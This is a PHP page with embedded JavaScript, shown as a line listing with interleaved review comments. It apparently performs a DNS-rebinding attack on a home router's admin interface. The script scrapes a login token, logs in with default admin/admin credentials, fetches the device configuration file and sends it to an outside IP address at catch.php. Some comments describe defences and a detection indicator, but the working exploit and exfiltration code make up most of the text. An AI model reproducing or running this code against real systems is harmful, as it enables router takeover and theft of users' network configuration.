- <?php
- // cache this page for a long time
// Both headers tell the browser to keep serving this page from its cache:
// Cache-Control allows 2592000 seconds (30 days) and Expires is set one year ahead.
// NOTE(review): a long-lived cached copy combined with the polling script below is
// consistent with a DNS-rebinding setup, where the hostname is expected to resolve
// to a different address later — inferred, not shown here. Defences against that
// class: rebinding protection in the resolver (dropping private addresses from
// public DNS answers) and Host-header validation on device admin interfaces.
- header("Cache-Control: max-age=2592000");
- header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
- ?>
- <html>
- <head>
- </head>
- <body>
- <h1>This is a sticky page...</h1>
- <script>
// Regex matching a script statement of the form
//   getObj("Frm_Logintoken").value = "...";
// and capturing the quoted value (presumably a per-session login token embedded
// in the target's login page — confirm against the device firmware).
- var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g
// Calls info() every 5000 ms; the handle is kept so info() can stop the polling
// with clearInterval() once a token has been captured.
- var timer = setInterval(function(){info();} ,5000);
// info(): one polling round against http://ligeti.com/.
//   1. Synchronous GET of the site root, then run `pattern` over the response body.
//   2. If a token was captured, POST a login form carrying that token and the
//      credentials admin/admin to the same URL.
//   3. Stop the polling timer, GET /template.gch and pass its body to sendResults().
// NOTE(review): reading xhr.responseText requires the browser to treat ligeti.com
// as this page's own origin (or the server to allow it via CORS) — presumably the
// page is served under that hostname; not shown here.
// Defensive takeaways: the login step only succeeds where the target still accepts
// admin/admin, and an admin interface that rejects requests whose Host header is
// not its own name or address would refuse every request made here.
- function info()
- {
// No `var`: xhr is an implicit global.
- xhr=new XMLHttpRequest();
// Third argument false = synchronous request; the call blocks until the response arrives.
- xhr.open("GET", "http://ligeti.com/", false);
- xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- xhr.send();
// exec() returns null when the fetched page does not contain the token statement.
- var result = pattern.exec(xhr.responseText);
- //alert (xhr.responseText);
- if(result != null)
- {
// result[0] is the whole match, result[1] the captured token value.
- if (result.length > 1)
- {
- var login = new XMLHttpRequest();
// Form body for the login request: captured token plus hard-coded admin/admin.
- var param = "frashnum=&action=login&Frm_Logintoken="+result[1]+"&Username=admin&Password=admin";
- //console.log(result[1]);
- login.open("POST", "http://ligeti.com/", false);
- login.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- login.send(param);
- //console.log(login.responseText);
// A token was found, so no further polling rounds are scheduled.
- clearInterval(timer);
// The response to the login POST is never inspected; the next request is sent regardless.
- var template = new XMLHttpRequest();
- template.open("GET", "http://ligeti.com/template.gch", false);
- template.send();
- //console.log(template.responseText);
- alert("Hacked");
// The full body of template.gch is what gets passed on for sending off-site.
- sendResults(template.responseText);
- }
- }
- }
// sendResults(data): sends `data` to http://92.253.72.62/catch.php by appending a
// <script> element whose src carries it in the `secret` query parameter.
// Loading a script by URL is not blocked by the same-origin restriction that
// applies to reading XHR responses, so the GET leaves the browser even though
// the destination is a different origin.
// Detection: outbound GET requests to /catch.php with a long `secret=` query
// string and `callback=myCallback`; the address 92.253.72.62 is the indicator
// given on this page. A Content-Security-Policy restricting script-src would
// block this channel on pages that set one.
- function sendResults(data)
- {
- alert("Sending Data");
// Implicit global; its name is passed as the `callback` parameter (JSONP-style)
// and it only logs whatever the remote script hands back.
- myCallback= function(data){console.log(data)}
- script = document.createElement('script');
- script.type = 'text/javascript';
- //myData = data.replace(/&/g, "&").replace(/>/g, ">").replace(/</g, "<").replace(/"/g, """);
- console.log(data);
// encodeURI() is applied to the whole URL, including the appended data.
- script.src = encodeURI('http://92.253.72.62/catch.php?secret=' + data + '&callback=myCallback');
// Appending the element to <head> is what triggers the request.
- document.head.appendChild(script);
- }
// Run the first round immediately instead of waiting for the first 5-second timer tick.
- info();
- </script>
- </body>
- </html>